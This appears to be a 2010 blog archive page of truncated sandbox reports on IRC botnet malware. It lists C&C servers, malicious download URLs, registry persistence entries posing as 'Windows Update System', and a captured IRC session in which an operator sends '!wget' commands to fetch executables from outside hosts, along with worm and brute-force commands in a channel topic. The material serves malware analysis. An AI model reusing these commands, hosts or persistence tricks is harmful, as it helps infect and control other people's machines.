Month: December 2010

DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.14.2 10.1.1.1 10.1.1.1 wpad stuypel.free.bg stuypel.free.bg 188.40.80.188 rolando9.clanhosters.org rolando9.clanhosters.org 174.121.1.58 sharo.fileave.com sharo.fileave.com 64.62.181.43 Opened listening TCP connection on port: 12380Download URLs http://188.40.80.188/Thumbsx.db (stuypel.free.bg) http://64.62.181.43/0234254.exe (sharo.fileave.com) Outgoing connection to remote server: stuypel.free.bg TCP port 80 Outgoing connection to remote server: rolando9.clanhosters.org TCP port 80 Outgoing connection to remote server:Read more...

– DNS Queries: Name Query Type Query Result Successful Protocol synyoshi.dyndns.info DNS_TYPE_A 173.224.219.21 YES udp 173.224.219.21:6667 Nick: n[XP-AUT]176146 Username: 8977 Joined Channel: #ganja# Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Update System” = C:Dokumente und EinstellungenAdministratorAnwendungsdatentaskeng.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows Update System” = C:Dokumente und EinstellungenAdministratorAnwendungsdatentaskeng.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “Windows Update System” = C:Dokumente undRead more...

DNS Lookup Host Name IP Address fri.dyndns.info 46.4.176.150 C&C Server: 46.4.176.150:6969 Server Password: Username: jukgljeclylnne Nickname: [DEU|XP|ilpqsde] Channel: #|fear|# (Password: ) Channeltopic: infos about hosting: http://whois.domaintools.com/46.4.176.150

DNS Lookup Host Name IP Address 76f.no-ip.biz 173.0.3.196 api.ipinfodb.com 67.212.74.82 Download URLs http://67.212.74.82/v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off (api.ipinfodb.com) Outgoing connection to remote server: 76f.no-ip.biz port 3333 Outgoing connection to remote server: api.ipinfodb.com TCP port 80 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareVB and VBA Program SettingsSrvIDID “UMUZZPIO31” = Spread HKEY_CURRENT_USERSoftwareVB and VBA Program SettingsINSTALLDATE “UMUZZPIO31” =Read more...

– DNS Queries: Name Query Type Query Result Successful Protocol saud.markaz-royal.net DNS_TYPE_A 46.4.176.169 YES udp 46.4.176.169:7493 Nick: {N}|AUT|XP|pc5|971512 Username: betqyd Server Pass: (null) Joined Channel: #null# Private Message to Channel #null#: “New Servant.” infos about hosting: http://whois.domaintools.com/46.4.176.169

DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.8.2 flash.quickupdates.net 46.4.232.76 www.whatismyip.com www.whatismyip.com 72.233.89.200 checkip.dyndns.org checkip.dyndns.org 91.198.22.70 Download URLs http://72.233.89.200/ (www.whatismyip.com) http://72.233.89.200/ (www.whatismyip.com) http://91.198.22.70/ (checkip.dyndns.org) http://91.198.22.70/ (checkip.dyndns.org) C&C Server: 46.4.232.76:5337 Server Password: Username: blaze Nickname: {iNF-00-DEU-XP-DELL-1855} Channel: #join (Password: error) Chanel: #irape Chanel: #b Channeltopic: :.aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -rRead more...

– DNS Queries: Name Query Type Query Result Successful Protocol b.wrzdns.com DNS_TYPE_A 195.162.69.158 YES udp 195.162.69.158:1726 Nick: {N}|AUT|XP|pc9|554622 Username: lerzri Server Pass: (null) Joined Channel: #b# Channel Topic for Channel #b#: “D http://www.yanille.com/SetupYanilleMMO.exe”

Connecting to 76.73.100.211 (8067) chanel:##Private##

Connecting to 41.57.133.155 (6667) chanel:#Establish Invisible Users: 1405 Operators: 1 operator(s) online Channels: 17 channels formed Clients: I have 787 clients and 1 servers Local users: Current Local Users: 787 Max: 916 Global users: Current Global Users: 1430 Max: 1725

Remote Host Port Number 195.162.68.118 7777 PASS google_x1[s7_4]rk-h.tmp NICK {N}|USA|XP|COMPUTERNAME|192671 USER vsqcdz “” “lfjx” :COMPUTERNAME JOIN #nonamefase PRIVMSG #nonamefase :New Servant. Now talking in #nonamefase Modes On: [ #nonamefase ] [ +smntu ] (niname) !wget http://www.rummagu.com/burnbuddy.exe (niname) !wget http://shoponline.muji.fr/images/sss.exe (niname) !wget http://www.rummagu.com/burnbuddy.exe (niname) !!wget http://www.rummagu.com/burnbuddy.exe (niname) !!wget http://www.rummagu.com/burnbuddy.exe (niname) !wget http://www.rummagu.com/burnbuddy.exe (niname) !msn Boot yourRead more...